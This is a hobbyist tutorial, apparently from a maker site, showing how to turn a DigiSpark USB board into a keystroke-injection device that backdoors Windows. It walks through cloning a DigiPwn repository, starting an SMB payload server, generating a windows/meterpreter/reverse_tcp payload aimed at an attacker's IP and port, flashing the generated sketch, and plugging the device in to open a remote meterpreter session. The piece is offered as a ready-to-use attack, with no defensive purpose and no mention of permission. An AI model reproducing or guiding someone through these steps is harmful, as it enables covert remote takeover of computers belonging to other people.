DigiPwn

by zero0overflow in Circuits > Software

686 Views, 3 Favorites, 0 Comments

DigiPwn

Screenshot from 2019-08-25 13-22-05.png
beZ-XZpsAF220I0rFWRmWt0cmtvyOqv4e95dRsPxIVA.jpg

So what are we doing here?

DigiSpark is a small Arduino based development tool which can act as an HID keyboard input. Today we manipulate this device to backdoor a Windows operating system!

Supplies

Arduino IDE

A windows machine

DigiSpark

Metasploit Framework

Python 2.7 (Note: You need python "2.7" don't go for any other version)

impacket

Brain! It helps


Clone the DigiPwn Repository!

Screenshot from 2019-08-25 13-36-18.png

Clone to the GitHub repo of DigiPwn by

git clone  https://www.github.com/zer0overflow/DigiPwn

Now change directory to DigiPwn by

cd DigiPwn/

Install Impacket [Modules Required by Python]

This module is required to run the SMB server which is required for payload library

sudo apt-get install python-impacket

Or you can download the impacket library and install it from here.

Lets Generate the Payload!

Screenshot from 2019-08-25 13-49-42.png
Screenshot from 2019-08-25 13-49-53.png

Run

python DigiPwn.py [HOST] [PORT] [PAYLOAD] [OUTPUT FILE] [format]

ex

python DigiPwn.py 192.168.1.2 8080 windows/meterpreter/reverse_tcp win.vbs win.vbs

Now you'll be asked if to start the stager and SMB server. Press y and hit enter

Now Upload the Code to Arduino!

Screenshot from 2019-08-25 14-00-08.png

Before we upload we need to make sure that DigiSpark board is installed in Arduino to do that look at here.

after that upload the keystroke_inject.ino file generated by the script. Once done you are ready to

Time to Plug in the Baby!

Screenshot from 2019-08-25 14-14-47.png

Plug in your DigiSpark now and wait for 10 seconds

BOOM There's a meterpreter session opened!